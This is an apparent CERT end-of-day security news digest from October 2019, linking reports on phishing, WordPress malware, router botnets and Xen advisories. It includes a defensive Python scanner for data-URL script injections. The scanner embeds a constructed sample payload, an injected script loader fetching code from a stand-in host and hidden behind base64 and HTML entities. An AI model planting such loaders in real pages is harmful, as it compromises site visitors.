Daily summary - 31.10.2019

End-of-Day report

Timeframe: Wednesday 30-10-2019 18:00 - Thursday 31-10-2019 18:00 Handler: Dimitri Robl Co-Handler: Stephan Richter

News

EML attachments in O365 - a recipe for phishing, (Thu, Oct 31st)

I've recently come across interesting behavior of Office 365 when EML files are attached to e-mail messages, which can be useful for any red teamers out there but which can potentially also make certain types of phishing attacks more successful.

https://isc.sans.edu/diary/rss/25474


Data URLs and HTML Entities in New WordPress Malware

Last week, an ongoing WordPress malware campaign started a new wave which included a variety of experimental injection types.

Scripts as Data URLs

The first type looks pretty similar to what we discussed in our recent post. However, instead of placing the code between the <script> tags, these injections have begun to embed it inline using the so-called data URL notation in the src parameter.

https://blog.sucuri.net/2019/10/data-urls-and-html-entities-in-new-wordpress-malware.html
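The scanning logic that item implies, written out as an added example (this is not code from the Sucuri post or from WordPress): pull the src of every <script> tag, decode HTML entities first, and only then parse and decode data: URLs, so an injection that hides the "data:" scheme behind entities is still caught. The sample page, the injected JavaScript and the use of decimal numeric entities are constructed assumptions; the page names HTML entities but does not show the exact encoding the campaign used.

```python
"""Detect <script src="data:..."> injections (optionally hidden behind HTML
entities) and decode their payloads. Added example; not from the Sucuri post."""
import base64
import html
import re
from urllib.parse import unquote

# <script ... src="..."> / src='...' / src=bare ; captures the src value.
SCRIPT_SRC_RE = re.compile(
    r'<script\b[^>]*?\bsrc\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s>]+))',
    re.IGNORECASE | re.DOTALL,
)
# data:[<mediatype>][;param=value]*[;base64],<data>
DATA_URL_RE = re.compile(r'^\s*data:([^;,]*)((?:;[^;,]*)*),(.*)$',
                         re.IGNORECASE | re.DOTALL)


def decode_data_url(url):
    """Return (mediatype, decoded_text) for a data: URL, or None if url is not one."""
    m = DATA_URL_RE.match(url)
    if m is None:
        return None
    mediatype, params, payload = m.group(1), m.group(2).lower(), m.group(3)
    if ';base64' in params:
        # Injected blobs are often wrapped or unpadded: strip whitespace, re-pad.
        cleaned = re.sub(r'\s+', '', payload)
        cleaned += '=' * (-len(cleaned) % 4)
        try:
            text = base64.b64decode(cleaned).decode('utf-8', 'replace')
        except ValueError:
            text = payload  # not valid base64; surface the raw blob for triage
    else:
        text = unquote(payload)
    return (mediatype or 'text/plain', text)


def find_data_url_scripts(markup):
    """Return one dict per <script> whose (entity-decoded) src is a data: URL."""
    hits = []
    for m in SCRIPT_SRC_RE.finditer(markup):
        raw_src = next(g for g in m.groups() if g is not None)
        # A plain grep for 'src="data:' misses entity-encoded injections,
        # so unescape the attribute value before matching.
        src = html.unescape(raw_src)
        decoded = decode_data_url(src)
        if decoded is None:
            continue
        hits.append({
            'raw_src': raw_src,
            'entity_obfuscated': src != raw_src,
            'mediatype': decoded[0],
            'payload': decoded[1],
        })
    return hits


# Constructed sample (not a real capture): the JS a dropper might inject.
INJECTED_JS = ('var s=document.createElement("script");'
               's.src="https://example.invalid/x.js";document.head.appendChild(s);')


def entity_encode(text):
    """Encode every character as a decimal HTML entity (assumed obfuscation style)."""
    return ''.join('&#%d;' % ord(c) for c in text)


# Constructed page: one legitimate script, one base64 data-URL injection, and one
# plain data-URL injection hidden entirely behind decimal HTML entities.
SAMPLE_HTML = (
    '<html><head>\n'
    '<script src="/wp-includes/js/jquery/jquery.js"></script>\n'
    '<script src="data:text/javascript;base64,'
    + base64.b64encode(INJECTED_JS.encode()).decode() + '"></script>\n'
    "<script src='" + entity_encode('data:text/javascript,' + INJECTED_JS) + "'></script>\n"
    '</head><body></body></html>\n'
)

if __name__ == '__main__':
    for hit in find_data_url_scripts(SAMPLE_HTML):
        print('entity-obfuscated=%s mediatype=%s' % (hit['entity_obfuscated'], hit['mediatype']))
        print('  payload:', hit['payload'])
```

Run it against a saved copy of a suspect page; a hit whose `entity_obfuscated` flag is set is the case a naive `grep 'src="data:'` would have missed.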


MS-ISAC Releases EOS Software Report List

Original release date: October 30, 2019. The Multi-State Information Sharing and Analysis Center (MS-ISAC) has released an end-of-support (EOS) software report list. Software that has reached its EOS date no longer receives security updates and patches from the vendor and is, therefore, susceptible to exploitation from security vulnerabilities.

https://www.us-cert.gov/ncas/current-activity/2019/10/30/ms-isac-releases-eos-software-report-list


5th eHealth Security Conference: ENISA advises on cybersecurity for hospitals

ENISA, the EU Agency for Cybersecurity organised the 5th consecutive eHealth Security Conference in cooperation with the Spanish Authorities and the Centre for Information Security of Catalonia (CESICAT) on the 30th October in Barcelona.

https://www.enisa.europa.eu/news/enisa-news/5th-ehealth-security-conference-enisa-advises-on-cybersecurity-for-hospitals


Office 365 Users Targeted by Voicemail Scam Pages

Over the past few weeks McAfee Labs has been observing a new phishing campaign using a fake voicemail message to lure victims into entering their Office 365 email credentials. At first, we believed that only one phishing kit was being used to harvest the user's credentials. However, during our investigation, we found three different malicious [...]

https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/office-365-users-targeted-by-voicemail-scam-pages/


Unused e-mail addresses give access to personal accounts

E-mail addresses that are no longer used are often reassigned. If these addresses are still registered with social-media accounts, gaming accounts, online shops or other login credentials, the new owners can gain access to those accounts. Criminals exploit this for fraud and extortion.

https://www.watchlist-internet.at/news/ungenutzte-e-mail-adressen-ermoeglichen-zugang-zu-persoenlichen-konten/


Untitled Goose Game security hole could have allowed hackers to wreak havoc

The highly popular "Untitled Goose Game" has been found to be vulnerable to an attack that could allow hackers to run malicious code on your computer.

https://hotforsecurity.bitdefender.com/blog/untitled-goose-game-security-hole-could-have-allowed-hackers-to-wreak-havoc-21721.html


Home & Small Office Wireless Routers Exploited to Attack Gaming Servers

Unit 42 researchers discovered an updated Gafgyt variant that looks to infect home and small office WiFi routers of known commercial brands, like Zyxel, Huawei, and Realtek, to attack gaming servers. More than 32,000 WiFi routers are potentially vulnerable to these exploits around the world.

https://unit42.paloaltonetworks.com/home-small-office-wireless-routers-exploited-to-attack-gaming-servers/


Advance notice: new website coming next week

tl;dr: No, we are not getting hacked next week, we are just putting a new website online.

http://www.cert.at/services/blog/20191031121150-2561.html

Vulnerabilities

XSA-299 Security Vulnerability

IBM is aware of a reported XSA-299 security vulnerability (CVE-2019-18421) that potentially would permit an attacker from within a VSI to elevate privileges to that of the host. There are no known malicious exploits of this vulnerability, which potentially impacts the hypervisor. IBM is implementing updates to remediate this vulnerability. No downtime for clients is expected and no client action is necessary for IBM Cloud virtual servers. While we do not anticipate any issues with remediation, we [...]

https://www.ibm.com/blogs/psirt/xsa-299-security-vulnerability/


Security updates for Thursday

Security updates have been issued by Debian (italc and python-ecdsa), Fedora (php and sudo), openSUSE (binutils and docker-runc), Oracle (thunderbird), Red Hat (firefox and sudo), SUSE (ardana-ansible, ardana-glance, ardana-horizon, ardana-input-model, ardana-manila, ardana-neutron, ardana-nova, ardana-octavia, ardana-tempest, crowbar-core, crowbar-ha, crowbar-openstack, crowbar-ui, galera-3, grafana, mariadb, mariadb-connector-c, novnc, openstack-cinder, openstack-glance, openstack-heat, [...]

https://lwn.net/Articles/803583/


XSA-303 - ARM: Interrupts are unconditionally unmasked in exception handlers

https://xenbits.xen.org/xsa/advisory-303.html


XSA-302 - passed through PCI devices may corrupt host memory after deassignment

https://xenbits.xen.org/xsa/advisory-302.html


XSA-301 - add-to-physmap can be abused to DoS Arm hosts

https://xenbits.xen.org/xsa/advisory-301.html


XSA-299 - Issues with restartable PV type change operations

https://xenbits.xen.org/xsa/advisory-299.html


XSA-298 - missing descriptor table limit checking in x86 PV emulation

https://xenbits.xen.org/xsa/advisory-298.html


XSA-296 - VCPUOP_initialise DoS

https://xenbits.xen.org/xsa/advisory-296.html


Next End-of-Day report: 2019-11-04